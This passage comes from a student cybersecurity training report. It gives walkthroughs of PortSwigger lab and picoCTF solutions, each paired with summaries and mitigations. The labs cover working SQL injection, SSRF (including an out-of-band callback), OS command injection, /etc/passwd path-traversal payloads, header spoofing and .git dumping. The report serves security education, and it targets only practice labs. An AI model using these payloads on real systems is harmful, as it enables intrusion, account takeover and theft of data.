5.8.1 Common causes of authentication bypass

include:

• Flaws in session management that allow attackers to reuse or hijack sessions.

• Logical errors in the authentication workflow, such as missing or incorrect validation checks.

• Exploitation of default or weak credentials.

• Vulnerabilities like SQL Injection or IDOR that allow bypassing login controls.

• Misconfigured access controls or failure to properly enforce authentication checks.

Attackers may exploit authentication bypass vulnerabilities to impersonate other users, including
administrators, leading to privilege escalation.

5.8.2 Preventing Authentication Bypass

• Implement strong, well-tested authentication mechanisms.

• Use multi-factor authentication where possible.

• Validate and sanitize all user inputs to prevent injection attacks.

• Properly manage and expire sessions.

• Enforce strict access control checks on all sensitive operations.

• Regularly audit and test authentication workflows for logical flaws.

Lab 6.1.1:
PoC:
1. Open Browser and navigate to https://0a12003c03a0170f8150c54f0041001e.websecurity-
academy.net/
2. Select one of the categories to show the query

61
 3. Edit the URL adding (‘ OR 1=1 -- ) to show hidden items

4. Before using query:

Figure 6.1.1

5. After using query:

Figure 6.1.2

1. Open Browser and navigate to https://0ac900530465080f8293666100d400dd.websecurity-

academy.net/
2. Validate presence of SQL injection by injecting (‘ or “) in login page leading to server error

Figure 6.1.3

3. Inject the username followed by (‘) and (–) (administrator’--) leading to successful login

62
 Figure 6.1.4

Lap 6.1.2

1. Open browser and navigate to https://0a7c0065040fd29880be085500340082.websecurity-

academy.net/
2. From the category below choose any and try to inject ‘ to validate sql injection

Figure 6.1.5

3. Open burp suite and choose the target from target section then right click and choose send to
repeater

Figure 6.1.6

63
 4. Inject the following in the
header ‘UNION SELECT
NULL,NULL,NULL –- to
eventually get a 200 ok response this
gives information that the
table has 3 columns
Figure 6.1.7

Figure 6.1.8

1. Open browser and navigate to https://0a3c0002045b1e9080c86cac00e30031.websecurity-

academy.net/
2. From the category below choose any and try to inject ‘ to validate sql injection

64
 6.2 Authentication

Summary:
Authentication vulnerabilities arise when a system’s login or identity verification mechanism is
improperly implemented or insufficiently secure. These flaws allow attackers to bypass login,
impersonate users, or gain unauthorized access to protected resources.

Impact:

• Unauthorized access
• Privilege Escalation
• Data Exposure
• Lateral Movement
• Service Abuse
• Reputation damage

Mitigation Strategies:

• Secure Password Handling

• Multi-Factor Authentication (MFA)
• Authentication Logic Hardening
• Brute-force & Enumeration Protection
• Session Management
• Regular Testing
• Secure Defaults

6.2.1 Lab 1 Username enumeration via different responses

PoC:
1.

Open browser and navigate to https://0a1b008803c7a45980f44ebb004c0017.websecurity-

academy.net/login, write any username and password to intercept using proxy server (Burp,
ZAP, etc..) and send the request to the intruder for brute forcing:

a. https://portswigger.net/web-security/authentication/auth-lab-usernames
b. https://portswigger.net/web-security/authentication/auth-lab-passwords
2. Using leaked usernames and passwords and marking both username and password from the
request

Load both username and password list provided in the payload configuration and set up the
intruder for cluster bomb attack and press start attack (Burp Suite Pro is recommended)

3. Look for status-code 302 found indicating that provided username and password are correct

Figure 6.2.1
 1.

6.2.2 Lab 2 2FA simple bypass

PoC:
Open browser and navigate to https://0a15008903bc3ae0b4b5005f00730014.websecurity-
academy.net/login and enter the victim’s credentials
2. While enumerating the endpoints /my-account was found when editing the URL to
bypass the 2FA verification it was a success indicating poor 2FA implementation

Figure 6.2.2

6.2.3 Lab 3 Password Reset Broken Logic

PoC:
 1.

Open browser and navigate to

https://0a94003703a207db80f57b5200ac00d0.websecurity-academy.net/forgot-
password and enter your username to get an email with a link for password reset

2. When entering password reset link you will get redirected to password resetting page
which you will need to enter your new password
3. Enter the new password and intercept the request and edit your username for the
victim username and the password will reset for his account

Gaining access to victim’s account.

Figure 6.2.3

6.2.4 Lab 4 Username enumeration via subtly different responses

PoC:
Open browser and navigate to
https://0a5800c704185df181a134f700ad0012.websecurity-academy.net/login, write
any username and password to intercept using proxy server (Burp, ZAP, etc..) and send
the request to the intruder for brute forcing:

a. https://portswigger.net/web-security/authentication/auth-lab-usernames
b. https://portswigger.net/web-security/authentication/auth-lab-passwords
2. Using leaked usernames and passwords and marking both username and password
from the request

Load both username and password list provided in the payload configuration and set
up the intruder for cluster bomb attack and press start attack (Burp Suite Pro is
recommended)
1.

4. Look for status-code 302 found indicating that provided username and password are
correct

Figure 6.2.4

6.3 Server-Side Request Forgery (SSRF)

Summary:

SSRF lets attacker send request on behalf of the server forging request signature of vulnerable
server assuming that attacker is in a privileged position

Impact:

• Internal Network Scanning

• Accessing Cloud Metadata APIs

• Bypassing Firewalls and Access Controls

• Remote Code Execution (RCE)

• Denial of Service (DoS)

Prevention/Mitigation:

• Using allowlist/whitelist & blocklist/blacklist

• Using secure proxy

• Implementing URL parsing validation

• Using network segmentation

• Disable unnecessary functionality

 1.

• Validating & sanitizing input

Types: Regular & Blind

6.3.1 Lab 1 Basic SSRF against the local server

PoC

Open browser and navigate to https://0a1b003b030bf849805b26d10014006c.websecurity-

academy.net/product?productId=1 while having the proxy server (Burp, ZAP, etc..) open with
the interception feature on then scroll down in the web page until you find a stock check
feature which fetches data from an internal system.

Figure 6.3.1

2. Press the Check Stock button making a request to check the stock of an item.

Figure 6.3.2

Change the header stockApi value to: http://localhost/admin, press ctrl+u while highlighting
the new value for URL encoding and forward the request fetching admin panel for deleting
users

3. Press delete beside the username Carlos to get a new request on the proxy server to
get the path from the GET request that will delete Carlos’s account from the server which is:
/admin/delete?username=carlos

Making a full payload by the first URL and the rest of the path replay step 2 but using
http://localhost/admin/delete?username=carlos as the new payload leading to the deletion of
the account from the server
1.
 1.

6.3.2 Lab 2 Basic SSRF against another back-end system

PoC

Open browser and navigate to https://0ad30012038a196b80cd584e00830042.websecurity-

academy.net/product?productId=1 while having the proxy server (Burp, ZAP, etc..) open with
the interception feature on then scroll down in the web page until you find a stock check
feature which fetches data from an internal system.

2. Press the Check Stock button making a request to check the stock of an item. Send the
request to the intruder for scanning the network for the admin interface by setting up
Payloads side panel, change the payload type to Numbers, and enter 1, 255, and 1 in the From,
To and Step boxes respectively and add § at the last octet of Ip address and add /admin at the
end of the URL and click start attack

3. Click on the status code to rearrange the responses ascendingly. The first response
should be 249 with a 200-status code indicating that the admin interface is 249. Switch back to
the interceptor and change the last octet to 249/admin to make the server fetch admin
interface giving the GET header for deleting Carlos’s account

Now make a new request by clicking Check stock button and editing the URL to (press ctrl+u
for URL encoding):

http://192.168.0.249:8080/admin/delete?username=carlos

deleting Carlos’s account.

 1.

6.3.3 Lab 3 Blind SSRF with out-of-band detection

PoC

Open browser and navigate to https://0a8f007a03eefc09808fa83000000024.websecurity-

academy.net/ while having the proxy server (Burp, ZAP, etc..) open with the interception
feature on. Press on any product to intercept the request.

2. Edit the Referer header from the current URL to an external server using https protocol
as following: https://m5s9q4la85r79lv708gl7ujgj7pydo1d.oastify.com

and click send.

3. Now click on the collaborator tab click poll now to see the interactions between the
backend and the external server. There would be DNS and

HTTP interactions that were initiated by the payload

6.4 Some CTFS

Challenge Goal

Access the flag on the /dashboard page after registration and OTP verification. The OTP is
unknown.

Severity High

Vulnerability Type Authentication Bypass / Business Logic Flaw

Affected Endpoint /dashboard (post-registration OTP verification bypass)

Authentication Impact Full authentication bypass (gain access without valid OTP)
 1.

Exploitability Easy (No OTP needed, just modify request in Burp)

Impact Account takeover / unauthorized access to restricted areas

CVSS v3 Score 8.8 (High) – [AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N]

Recommendation Server-side strict validation of OTP; reject if incorrect or missing.

PoC (Proof of Concept) Steps to Reproduce

6.4.1 Lap1
1. Open browser and navigate to Registration

2. Register a New User then submit it while having the interception of the burp suit is
on .

3. Then it will want an OTP from you so enter any value

4. then send this request to the repeater then remove the OTP parameter .
 1.

Why Did This Work?

The server does not properly validate the OTP.

It simply checks if an OTP submission happened, not whether it was correct. So when you
remove the OTP completely, the server skips validation and assumes OTP verification is done
— a logic flaw in the authentication flow.

6.4.2 Lap2 :Challenge Name: Can you find the robots?

Goal:

Find the flag hidden somewhere on the server — you're given only a link to the main page:
http://jupiter.challenges.picoctf.org:36474
1.

Type Info Disclosure

Impact Low

Severity Low (CVSS ~3.5)

Exploitability Very easy (no auth, just browser

access)

PoC (Proof of Concept) Steps to Reproduce

1. Visit the Website: https://jupiter.challenges.picoctf.org/problem/36474/

But the page didn't show anything useful — just a basic placeholder or nothing at all.

2. We add /robots.txt at the end of the given URL to check for hidden or disallowed
paths that might reveal sensitive pages not meant for public access. The content was:
1.

User-agent: *

Disallow: /477ce.html

This directive instructs search engines to avoid indexing the path /477ce.html. However, for
the purpose of this challenge, this is precisely the location we intend to investigate.

3. Access the Hidden Page You then opened the URL:

http://jupiter.challenges.picoctf.org:36474/477ce.html And on that page, you found the flag!

6.4.3Lap:3 Insp3ct0r

Challenge Goal

To obtain the full flag by inspecting and analyzing the source code and hidden resources of
the target web page. The first part of the flag is hidden within an HTML comment, and
further parts may be hidden in other locations.

Severity Medium

Vulnerability
Information Disclosure via HTML Comments
Type

Affected
/problem/41511/ (main HTML page)
Endpoint

Authentication
None – publicly accessible
Impact
1.

Very Easy – requires only browser dev tools or view page

Exploitability
source

Impact Disclosure of sensitive information (1/3 of the flag)

CVSS v3 Score 5.3 (Medium) – [AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N]

Avoid embedding sensitive information in HTML comments;

Recommendation remove before deployment

1. Open the URL in your browser My First Website :)

2. Right-click on the page and select View Page Source (or press Ctrl+U).

3. look for hidden information within comments (<!-- -->). In this challenge, a portion of the flag
was embedded in an HTML comment, which is not rendered visually in the browser but remains
part of the code — a common CTF technique for hiding clues.

Analyze Linked Resources (CSS & JavaScript)

Following the clue, we inspected the linked files in the <head> tag:

CSS File (mycss.css): Contained the second part of the flag hidden within a comment.

JavaScript File (myjs.js): Contained the final part of the flag in a comment or variable.

Combining the three discovered parts gave us the complete flag:

picoCTF{tru3_d3t3ctive_0r_d3v3l0per}

4.
1.

picoCTF{tru3_d3

6.5 OS command injection

Vulnerability: Directory Listing Enabled

Explanation

Web servers may be inadvertently configured to allow automatic directory listing in cases
where a default index file (e.g., index.html or index.php) is not present. When enabled, this
feature allows anyone accessing the directory via a web browser to view a list of all files and
subdirectories it contains.

Such configurations may expose internal or sensitive files that were not intended for public
access, including but not limited to temporary files, backup scripts, configuration files, and
debugging data. This significantly aids attackers in the reconnaissance phase of an attack by
revealing the internal structure of the web application and allowing them to selectively target
exposed resources.

Severity: Low
1.

Impact

Although directory listing in itself does not directly result in unauthorized access or code
execution, it can facilitate more critical exploits. For instance, the availability of file names,
scripts, and configuration data may allow attackers to:

• Discover vulnerable components within the application;

• Access sensitive information such as credentials, API keys, or internal endpoints;

• Bypass access controls through hidden files or endpoints not intended for public
discovery.

This behavior is analogous in principle to OS command injection in a simplified context, in

that it grants the attacker increased visibility and control over internal assets. While OS
command injection allows for the execution of arbitrary system commands, directory listing
allows for systematic discovery of potentially exploitable resources—a critical step that may
lead to more severe attacks.

Recommendation

Directory listing is rarely required in production environments and should be explicitly

disabled to minimize information disclosure risks. The following measures are recommended:

1. Web Server Configuration:

o Apache: Ensure that the following directive is used in the configuration file or
.htaccess:

apache

CopyEdit

Options -Indexes

o Nginx: Ensure that the autoindex directive is set to off:

nginx CopyEdit autoindex off;

2. Deployment of Default Index Files:

In directories that are intended to be publicly accessible, ensure the presence of a default
index file (e.g., index.html) to prevent automatic listing by the web server.

By removing unnecessary directory visibility, these steps help reduce the application’s attack
surface and hinder adversaries from gaining early insights into the system’s architecture.
1.

6.5.1 Lap 1
First

Acsses the lab then open any item to find equal parameter

3.Send the request to the repeater

1.

4. try these common parameter after the equal sign ; , | , || , && then whoami

Then send the request if still 400 bad like this try the other operators

it work on &&

As it not working and didn’t get the user name so we try to encode the parameters like this
 1.

we found the user peter-jbVKLA

6.5.2 lap 2
required This lab contains a blind OS command injection vulnerability in the feedback
function.

The application executes a shell command containing the user-supplied details. The output
from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second
delay.

Open submit feed back then

Fill this then submit

1.

open the request on the burp and add this command like this in the csrf
email=x||ping+c+10+127.0.0.1||
 1.

6.5.3 Lap 3
This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output
from the command is not returned in the response. However, you can use output redirection
to capture the output from the command. There is a writable folder at:

/var/www/images/

The application serves the images for the product catalog from this location. You can redirect
the output from the injected command to a file in this folder, and then use the image loading
URL to retrieve the contents of the file. The when sumbiting the feedback

1. Navigate to the Target Open browser and go to:

https://0a73004a038df72a81410cd200990047.web-securityacademy.net/feedback while
Burp Suite interception is ON.

2. Submit Feedback
1.

Fill the feedback form with the following:

3. Modify the Email Parameter with the Payload:

Change the email field in the intercepted request to:

4. email=||whoami>/var/www/images/output.txt||

5. This injects the whoami command and writes the output to a file. Forward the
Modified Request.

Click Forward in Burp Suite to send the payload to the server.

6. Intercept a Product Image Request and Modify It:

Navigate to any product image (or manually construct the request) and intercept it in Burp.
1.

7. Then go to home page then select item then send its request to the repeater to edit
Modify the filename parameter to:

The whoami output was successfully written to the server’s image folder and retrieved via
the image loading functionality. This confirms a blind command injection vulnerability with
output redirection.
1.

6.6 Path Traversal

Summary:

Aims to access files & directories that are stored outside web root folder manipulating variables
that reference files with ../ sequence & its variations or by using absolute file paths and it may
be possible to access files & directories stored on file system

Impact:

1. Unauthorized access to sensitive files

2. Source code disclosure

3. If chained with other vulnerabilities can lead to an RCE

4. Compromise the entire system

Prevention/Mitigation:

• Input validation

• Using secure API

• Disable directory listing

• Least privilege principle

• Using WAF
 1.

6.6.1 Lab 1 File path traversal, simple case

PoC

1. Open browser and navigate to

https://0aec008c040f2b9b8032f34800ea00cf.websecurity-academy.net/product?productId=3
while intercepting the request using proxy server (burp, ZAP, etc..) you will find a request that
fetches the image form the server with a parameter of /image?filename=20.jpg that can be
exploited

2. Change the parameter to ../../../../etc/passwd to fetch the contents of the path and
send the request then change the tab to HTTP history and scroll down to find the request with
URL /image?filename=20.jpg click on the request and you will get a response that contains user
account information
 1.

6.6.2 Lab 2 File path traversal, traversal sequences blocked with absolute path
bypass
PoC

1. Open browser and navigate to

https://0ab800720459b57a843a2db500410049.websecurity-
academy.net/product?productId=1 while intercepting the request using proxy server (burp,
ZAP, etc..) you will find a request that fetches the image form the server with a parameter of
/image?filename= 7.jpg that can be exploited

2. Change the parameter to /etc/passwd to fetch the contents of the path and send the
request then change the tab to HTTP history and scroll down to find the request with URL
/image?filename=7.jpg click on the request and you will get a response that contains user
account information
 1.

6.6.3 Lab 3 File path traversal, traversal sequences stripped non-recursively

PoC

1. Open browser and navigate to

https://0ab800720459b57a843a2db500410049.websecurity-
academy.net/product?productId=1 while intercepting the request using proxy server (burp,
ZAP, etc..) you will find a request that fetches the image form the server with a parameter of
/image?filename= 28.jpg that can be exploited send the request to the repeater for further
testing

2. Change the parameter to ../../../../etc/passwd to fetch the contents of the path and
send the request that gives us a 400 status-code with a message saying no such file

3. Change the parameter to ....//....//....//etc//passwd to fetch the contents of the path

and send the request that gives us a 200 status-code with a response that contains user
account information
 1.

6.6.4 Lab 4 File path traversal, traversal sequences stripped with superfluous
URL-decode
PoC

1. Open browser and navigate to

https://0a0e0000032e6b8a8172724200bf00b6.websecurity-
academy.net/product?productId=1 while intercepting the request using proxy server (burp,
ZAP, etc..) you will find a request that fetches the image form the server with a parameter of
/image?filename= 29.jpg that can be exploited send the request to the repeater for further
testing

2. Change the parameter to ../../../../etc/passwd to fetch the contents of the path and
send the request that gives us a 400 status-code with a message saying no such file

3. Change the parameter to ....//....//....//etc//passwd to fetch the contents of the path

and send the request that gives us a 400 status-code

4. Let’s try double encoding the request making the payload

%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd

fetching the contents of the path and send the request that gives us a 200 statuscode with a
response that contains user account information

6.7 Business Logic Vulnerability

1.

Summary:

A Business Logic Vulnerability is a security flaw that arises when an attacker abuses the
intended behavior or flow of a web application’s business rules or processes to gain
unauthorized access, perform unintended actions, or cause disruption.

Unlike typical vulnerabilities (e.g., XSS, SQLi), BLVs do not exploit coding mistakes, but rather
flaws in how the system is designed to function.

Impact:

The impact can vary based on the business process being abused, but common consequences
include:

• Financial loss

• Privilege escalation

• Inventory manipulation

• Order tampering

• Reputation damage

• Data integrity issues

Mitigation:

1. Understand the business logic

2. Implement strict validation

3. Enforce proper access control

4. Use state machines or workflow engines

5. Security Testing

6. Rate limiting & anomaly detection

Lab 1 Excessive trust in client-side controls PoC

1.

Open browser and navigate to https://0aec00a104a5b27c813b6b4b00f10074.websecurity-

academy.net/login and login to your account. Choose any product you want to buy and click on
place in cart while intercepting the request

2. Navigate to intercept tab in the proxy server, 4 parameters were found:

a. productid

b. redir

c. quantity

d. price

edit the price to 100 making the product costs 1$ navigate to cart for checkout
1.

Information Disclosure

Vulnerability Explanation:

Information disclosure, also known as information leakage, is when a website unintentionally

reveals sensitive information to its users. This information can be: • Usernames and
passwords

• Financial info.

• Technical details and infrastructure of website Severity:

• Low: Disclosure of internal IP addresses, server banners, or software versions without

known vulnerabilities.

• Medium: Leak of directory structures, internal usernames, database names, or partial

configuration files.

• High: Exposure of sensitive data such as PII, credentials (even hashed), session tokens,
or API keys.

• Critical: Full access to configuration backups, source code, or database dumps from
public endpoints.

Impact: (Depending on Severity)

• Low: Minor reconnaissance value

• Medium: Facilitates further targeted attacks

• High: Enables authentication bypass, impersonation, or lateral movement.

• Critical: Direct path to compromise attackers can emulate or exploit core application
logic.

Prevention/Mitigation:

• Error handling & custom error message

• Disable directory listing

• Secure config. File

• Use secure communication

• Limit access to sensitive info.

• Audit any code for potential info. Disclosure

PoC (1):
1.

1. Open browser and navigate to

https://0a7100130350d6bf8048679c000a0009.websecurity-academy.net/

2. Click on View details

3. Edit the URL after the “=”

4. Resulting in an internal server error exposing server version

1.

PoC (2):

1. Open browser and navigate to

https://0a6d006f04a080db81cf678e00f300a8.websecurity-academy.net/ while burp suite is
capturing traffic in background

2. After the traffic is captured select the root directory

3. Search for a html comment (<!—)

4. Now navigate to https://0a6d006f04a080db81cf678e00f300a8.web-

securityacademy.net/cgi-bin/phpinfo.php
1.

POC (3):

1. Open browser and navigate to

https://0a3d00f603bc5c918173d4ec006a0043.websecurity-academy.net/

2. Edit URL and add /robots.txt

3. The URL reveals a hidden backup directory (/backup)

4. Navigate to https://0a3d00f603bc5c918173d4ec006a0043.web-
securityacademy.net/backup

5. The /backup reveals admin database credentials

1.

POC (4):

1. Open browser and navigate to

https://0a7d004d034d1b1e828fd34600380038.websecurity-academy.net/login while HTTP
history is on

2. Edit URL and add /admin at the ending of URL

3. Results in

4. Navigate in the HTTP history and look for right click on it and press send to repeater

5. Navigate to repeater and change the GET/ with TRACE/

1.

6. A response was made, notice X-Custom-IP-Authorization: 102.47.122.107 at the end of

the response

7. Navigate to match and replace in the proxy tab via burp suite

8. Click add make sure the type is set to request header and edit Replace and write
XCustom-IP-Authorization:127.0.0.1 and press ok

9. Press on home and an admin panel should appear and when clicking on it shows that
users can be deleted
1.

POC (5):

1. Open Browser and navigate

to

https://0a5c0038044576798146bbd900ef009b.websecurity-academy.net/

2. Add /.git at the end on the URL to reveal index of /.git

3. Clone the Git repo using GitDumper:

• git clone https://github.com/internetwache/GitTools.git

• cd GitTools/Dumper

• ./gitdumper.sh https://0a5c0038044576798146bbd900ef009b.web-
securityacademy.net/.git/ /home/f0rg4d/
1.

4. Navigate to place of saved repo (/home/f0rg4d/ in my case)

5. Write the command git log to show the latest commits made

6. Use git show 77a26a919c025020c2912c3bbe4359515364b4ae to reveal the commit

that was made revealing sensitive information about admin password
1.
Lab 2 High-level logic vulnerability PoC

Open browser and navigate to https://0aec00a104a5b27c813b6b4b00f10074.websecurity-

academy.net/login and login to your account. Choose any product you want to buy and click on place
in cart while intercepting the request

2. While viewing the request 3 parameters were found:

a. productid

b. quantity

c. redir

edit the quantity to -1 and try to checkout which will give us an error message that says Cart total
price cannot be less than zero so let’s add another item that will increase the total to a positive item
when deducing the right units proceed to check out.

104
Lab 3 Inconsistent security controls PoC

Open browser and navigate to https://0a4c00c503a1365981044d4100810069.websecurity-

academy.net/register enter your username, valid email and password. Take note of the prompt on
the register forum: If you work for DontWannaCry, please use your @dontwannacry.com email
address

2. After logging in to the account a change email functionality is present which, I can change my email
from a normal user to an admin by adding my username to @dontwannacry.com Without any
credentials needed giving me access to admin panel

105
 Conclusion
The summer training program on Cybersecurity at Digital Fortresses, in collaboration with the Higher
Technological Institute (HTI), has been a transformative experience, providing a comprehensive foundation in
the essential domains of modern information security. Over the course of the program, we explored a wide
range of topics, each contributing to a deeper understanding of both the fundamental principles and
advanced practices of cybersecurity.

The training began with a solid grounding in Network Fundamentals, where we developed a thorough
understanding of network architectures, protocols, and security mechanisms — critical for protecting
communication systems. This was followed by Information Gathering and Reconnaissance, which introduced
both passive and active techniques for identifying system vulnerabilities. We then progressed to Linux System
Administration and Bash Scripting, acquiring the skills to configure, secure, and manage Linux environments,
as well as automate administrative and security tasks to improve efficiency.

A core part of the program focused on Web Application Security Testing, where we examined common
vulnerabilities such as SQL Injection, Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF),
authentication bypass, and insecure direct object references (IDOR). Using industry-standard tools such as
Burp Suite, Nmap, and Metasploit, we learned practical exploitation methods alongside mitigation strategies,
reinforcing our understanding of secure application design and defense techniques.

The final phase of the program was dedicated to practical labs and projects, where we applied the knowledge
and skills gained to realistic cybersecurity scenarios. These projects tested our ability to think critically,
identify threats, and design effective solutions under real-world constraints.

In summary, this training has provided a well-rounded education in cybersecurity principles, tools, and
methodologies, equipping us with the skills needed to protect systems and networks in today’s evolving
threat landscape. The insights gained will serve as a strong foundation for both academic advancement and
professional success, enabling us to contribute effectively to the ever-growing field of information security.

106
 References

1. 1.OWASP Foundation. (2024). OWASP Top Ten Web Application Security Risks. Retrieved from
https://owasp.org/www-project-top-ten/
2. Scarfone, K., & Mell, P. (2007). Guide to Intrusion Detection and Prevention Systems (IDPS) (NIST
Special Publication 800-94). National Institute of Standards and Technology. Retrieved from
https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-94.pdf
3. OWASP Foundation. (2024). SQL Injection. Retrieved from https://owasp.org/www-
community/attacks/SQL_Injection
4. OWASP Foundation. (2024). Cross-Site Scripting (XSS). Retrieved from https://owasp.org/www-
community/attacks/xss/
5. OWASP Foundation. (2024). Command Injection. Retrieved from https://owasp.org/www-
community/attacks/Command_Injection
6. OWASP Foundation. (2024). Path Traversal. Retrieved from https://owasp.org/www-
community/attacks/Path_Traversal
7. OWASP Foundation. (2024). File Inclusion. Retrieved from https://owasp.org/www-
community/vulnerabilities/File_Inclusion
8. OWASP Foundation. (2024). Server-Side Request Forgery (SSRF). Retrieved from
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
9. OWASP Foundation. (2024). Insecure Direct Object References (IDOR). Retrieved from
https://owasp.org/www-community/attacks/Insecure_Direct_Object_References
10. OWASP Foundation. (2024). Authentication Bypass. Retrieved from https://owasp.org/www-
community/attacks/Authentication_Bypass
11. Barrett, D., & Kipper, G. (2010). Virtualization and Forensics: A Digital Forensic Investigator’s
Guide to Virtual Environments. Syngress.
12. Skoudis, E., Liston, T., & Aitel, D. (2008). Counter Hack Reloaded: A Step-by-Step Guide to
Computer Attacks and Effective Defenses (2nd ed.). Prentice Hall.
13. Lyon, G. F. (2009). Nmap Network Scanning: The Official Nmap Project Guide to Network
Discovery and Security Scanning. Insecure.Com LLC.
14. PortSwigger Ltd. (2024). Burp Suite Documentation. Retrieved from
https://portswigger.net/burp/documentation
15. Offensive Security. (2024). Metasploit Unleashed. Retrieved from https://www.offensive-
security.com/metasploit-unleashed/

107